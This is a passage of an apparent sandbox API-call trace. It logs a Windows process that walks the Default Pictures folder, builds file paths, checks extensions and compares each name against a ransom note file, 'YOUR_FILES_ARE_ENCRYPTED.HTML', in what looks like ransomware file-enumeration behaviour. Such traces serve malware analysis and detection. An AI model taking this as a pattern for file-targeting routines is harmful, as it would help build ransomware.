PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x5277f346, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5277f346, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e80d1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile15.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0169.969] lstrlenW (lpString=".bmp") returned 4 [0169.969] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527a54ae, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527a54ae, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile16.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0169.969] lstrlenW (lpString=".bmp") returned 4 [0169.969] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0169.969] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | 
out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0169.969] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 86 [0169.969] lstrcmpW (lpString1="usertile17.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.969] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0169.970] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1eccfdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile18.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0169.970] FindNextFileW 
(in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ef313c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile19.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0169.970] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile20.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0169.970] lstrlenW (lpString=".bmp") returned 4 [0169.970] PathFindExtensionW 
(pszPath="usertile20.bmp") returned=".bmp" [0169.970] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528178e6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528178e6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0169.970] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 86 [0169.970] lstrcmpW (lpString1="usertile21.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.970] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0169.971] lstrlenW (lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5283da4e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5283da4e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f3f3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile22.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.971] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0169.971] lstrlenW 
(lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52863bb6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52863bb6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f6555c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile23.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.971] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0169.971] lstrlenW (lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528afe86, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528afe86, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2238f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile24.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.971] PathFindExtensionW 
(pszPath="usertile24.bmp") returned=".bmp" [0169.971] lstrlenW (lpString=".bmp") returned 4 [0169.971] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0169.971] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf225f0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0169.971] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 86 [0169.971] lstrcmpW (lpString1="usertile25.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf228523c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 86 [0169.972] lstrcmpW (lpString1="usertile26.bmp", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529222be, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529222be, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 86 [0169.972] lstrcmpW (lpString1="usertile27.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52948426, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52948426, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 
86 [0169.972] lstrcmpW (lpString1="usertile28.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.972] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0169.972] lstrlenW (lpString=".bmp") returned 4 [0169.972] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0169.972] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5296e58e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5296e58e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22d14fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0169.972] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile29.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529946f6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529946f6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile30.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile30.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529ba85e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529ba85e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile31.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a06b2e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a06b2e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 86 [0169.973] lstrcmpW (lpString1="usertile32.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.973] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0169.973] lstrlenW (lpString=".bmp") returned 4 [0169.973] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0169.973] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a52dfe, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a52dfe, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0169.973] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile33.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.974] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0169.974] lstrlenW (lpString=".bmp") returned 4 [0169.974] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0169.974] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a78f66, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a78f66, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23b5d3c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0169.974] wnsprintfW (in: 
pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile34.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.974] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0169.974] lstrlenW (lpString=".bmp") returned 4 [0169.974] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0169.974] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a9f0ce, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a9f0ce, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23dbe9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0169.974] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile35.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.974] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0169.974] lstrlenW (lpString=".bmp") returned 4 [0169.974] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0169.974] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2401ffc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", 
cAlternateFileName="")) returned 1 [0169.974] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 86 [0169.974] lstrcmpW (lpString1="usertile36.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf242815c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 86 [0169.975] lstrcmpW (lpString1="usertile37.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b3766e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b3766e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf244e2bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, 
dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 86 [0169.975] lstrcmpW (lpString1="usertile38.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b5d7d6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b5d7d6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf247441c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 86 [0169.975] lstrcmpW (lpString1="usertile39.bmp", 